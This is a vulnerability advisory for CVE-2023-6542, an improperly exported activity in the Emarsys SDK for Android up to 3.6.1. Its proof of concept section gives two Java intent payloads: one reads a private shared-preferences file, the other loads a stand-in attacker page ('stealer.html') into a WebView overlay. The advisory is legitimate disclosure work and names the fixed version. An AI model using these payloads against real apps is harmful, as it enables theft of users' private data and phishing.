SAP Emarsys SDK for Android <= 3.6.1 Sensitive Data Leak

ADVISORY INFORMATION

• Product: Emarsys SDK for Android
• Vendor URL: https://github.com/emartech/android-emarsys-sdk
• CWE: Improper Export of Android Application Components [CWE-926]
• Date found: 2023-11-10
• Date published: 2025-04-10
• CVSSv4 Score: 8.3 (CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N)
• CVE: CVE-2023-6542

CREDITS

This vulnerability was discovered and researched by Julien Ahrens from RCE Security.

VERSIONS AFFECTED

Emarsys SDK for Android <= 3.6.1

INTRODUCTION

The Emarsys SDK enables you to use Mobile Engage in a very straightforward way. By incorporating the SDK in your app, we support you, among other things, in handling credentials, API calls, tracking of opens and events as well as logins and logouts in the app.

The Emarsys SDK is open sourced to enhance transparency and to remove privacy concerns. This also means that you can always be up-to-date with what we are working on.

Using the SDK is also beneficial from the product aspect: it simply makes it much easier to send push messages through your app. You do not have to follow and implement changes in our API calls, endpoints and parameters: we do it for you in the SDK. Your only task is to use the latest version of the SDK in your app and we take care of everything else.

(from the vendor’s homepage)

VULNERABILITY DETAILS

The SDK adds the “com.emarsys.NotificationOpenedActivity” to any Android app that uses the SDK. This activity processes extra intent data sent from other apps without validation through its createNotificationCommand() method. As part of this functionality, the PreloadedInappHandlerCommand class uses the supplied intent data to perform various actions based on the provided intent data, including returning local and remote file contents as well as deleting local files.

Successful exploits can allow an attacker to read data from local files and from remote URLs into a local WebView and also delete files from the app’s private data directory.

PROOF OF CONCEPT

To leak files from the app’s private data directory:

Intent intent = new Intent(); 
intent.setClassName("app", "com.emarsys.NotificationOpenedActivity"); 
intent.setAction("OpenExternalUrl"); 
Bundle extraBundle = new Bundle(); 
String emsPayload = "{\"inapp\": {\"campaignId\": 1, \"fileUrl\":\"/data/data/app/shared_prefs/sensitive.xml\"}, \"actions\": [{\"id\":\"OpenExternalUrl\"}]}"; 
extraBundle.putString("ems", emsPayload); 
intent.putExtra("payload", extraBundle); 
startActivity(intent);

To load remote web content into an overlay:

Intent intent = new Intent();
intent.setClassName("app","com.emarsys.NotificationOpenedActivity");
intent.setAction("OpenExternalUrl");
Bundle extraBundle = new Bundle();
String emsPayload = "{\"inapp\": {\"campaignId\": 1, \"url\":\"https://crazy.hacker.url/stealer.html\"}, \"actions\": [{\"id\":\"OpenExternalUrl\"}]}";
extraBundle.putString("ems", emsPayload);
intent.putExtra("payload", extraBundle);
startActivity(intent);

SOLUTION

Update to version 3.6.2

REPORT TIMELINE

• 2023-11-10: Discovery of the vulnerability
• 2023-11-18: Reported to SAP via security@sap.com
• 2023-12-08: SAP (Responsible CNA) assigns CVE-2023-6542
• 2023-12-12: SAP discloses their limited security advisory (note #3406244)
• 2025-04-10: Full Disclosure

REFERENCES

• https://www.rcesecurity.com/2025/04/sap-emarsys-sdk-for-android-sensitive-data-leak-cve-2023-6542/
• https://github.com/emartech/android-emarsys-sdk
• https://www.sap.com/documents/2022/02/089613a0-167e-0010-bca6-c68f7e60039b.html
• https://me.sap.com/notes/3406244